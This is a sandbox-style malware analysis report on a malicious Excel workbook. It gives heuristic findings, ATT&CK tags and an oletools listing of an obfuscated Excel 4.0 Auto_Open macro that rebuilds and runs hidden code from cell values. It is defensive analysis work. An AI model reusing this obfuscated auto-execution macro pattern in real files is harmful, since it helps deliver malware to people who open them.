MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open defined name, which is a critical finding indicating automatic execution upon opening. The macros utilize dangerous formula APIs, including a RUN function, suggesting an intent to execute arbitrary code. While the exact payload is not visible, the presence of these elements strongly indicates a downloader or initial execution stage for a malicious artifact.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6563 bytes |
SHA-256: 316f1bb657f7e1d9155d84db708e10ca3634dd1585b5f1d5320c8135e3244b57 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - fdo
' 0018 22 LABEL : Cell Value, String Constant - AKqPdFk len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G153
' 0018 21 LABEL : Cell Value, String Constant - byILBG len=0
' 0018 22 LABEL : Cell Value, String Constant - DljQoDM len=0
' 0018 20 LABEL : Cell Value, String Constant - DVUgs len=0
' 0018 21 LABEL : Cell Value, String Constant - ekehnR len=0
' 0018 25 LABEL : Cell Value, String Constant - FkYGYghOVO len=0
' 0018 23 LABEL : Cell Value, String Constant - gsNQWJaH len=0
' 0018 22 LABEL : Cell Value, String Constant - hUdzGoX len=0
' 0018 24 LABEL : Cell Value, String Constant - KorOwOOMg len=0
' 0018 21 LABEL : Cell Value, String Constant - lQOGHX len=0
' 0018 20 LABEL : Cell Value, String Constant - mdQMH len=0
' 0018 26 LABEL : Cell Value, String Constant - MemwVMrOSyo len=0
' 0018 24 LABEL : Cell Value, String Constant - obgkLsORl len=0
' 0018 21 LABEL : Cell Value, String Constant - qaOJNo len=0
' 0018 23 LABEL : Cell Value, String Constant - QdzJSNds len=0
' 0018 24 LABEL : Cell Value, String Constant - rNlZvGoHv len=0
' 0018 21 LABEL : Cell Value, String Constant - VxWxMF len=0
' 0018 24 LABEL : Cell Value, String Constant - xSDXGoIAk len=0
' 0018 26 LABEL : Cell Value, String Constant - zeKOYqsFUsx len=0
' 0018 23 LABEL : Cell Value, String Constant - zPgaNVXo len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' fdo,Q46,"",219.00000000000000000000
' fdo,Q47,"",-988.00000000000000000000
' fdo,Q48,"",701.00000000000000000000
' fdo,Q49,"",-368.00000000000000000000
' fdo,Q50,"",-97.00000000000000000000
' fdo,Q51,"",488.00000000000000000000
' fdo,G61,"SET.NAME("qaOJNo",0+VALUE("0"))",""
' fdo,G65,"SET.NAME("obgkLsORl",qaOJNo)",""
' fdo,G68,"SET.NAME("DljQoDM",qaOJNo)",""
' fdo,G70,"SET.NAME("ekehnR",COUNTA(MemwVMrOSyo))",""
' fdo,G73,"SET.NAME("lQOGHX",COUNTA(VxWxMF))",""
' fdo,G77,[],""
' fdo,G81,"SET.NAME("FkYGYghOVO","")",""
' fdo,G85,"obgkLsORl",""
' fdo,G87,"SET.NAME("zeKOYqsFUsx",HLOOKUP("*",MemwVMrOSyo,obgkLsORl,FALSE))",""
' fdo,G90,"hUdzGoX",""
' fdo,G93,"SET.NAME("QdzJSNds",qaOJNo)",""
' fdo,G98,[],""
' fdo,G103,"QdzJSNds",""
' fdo,G106,"KorOwOOMg",""
' fdo,G109,"byILBG",""
' fdo,G114,"gsNQWJaH",""
' fdo,G118,"SET.NAME("mdQMH",VALUE(HLOOKUP("*",VxWxMF,gsNQWJaH,FALSE)))",""
' fdo,G123,"AKqPdFk",""
' fdo,G126,"FkYGYghOVO",""
' fdo,G128,"DljQoDM",""
' fdo,G132,NEXT(),""
' fdo,G136,"xSDXGoIAk",""
' fdo,G138,[],""
' fdo,G142,"zPgaNVXo",""
' fdo,G145,NEXT(),""
' fdo,G148,RETURN(),""
' fdo,G176,"SET.NAME("rNlZvGoHv",G61)",""
' fdo,G179,"MemwVMrOSyo",""
' fdo,G182,"SET.NAME("VxWxMF",R72C12)",""
' fdo,G187,"SET.NAME("zPgaNVXo",195)",""
' fdo,G192,"SET.NAME("DVUgs",7)",""
' fdo,G194,rNlZvGoHv(),""
' fdo,G195,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.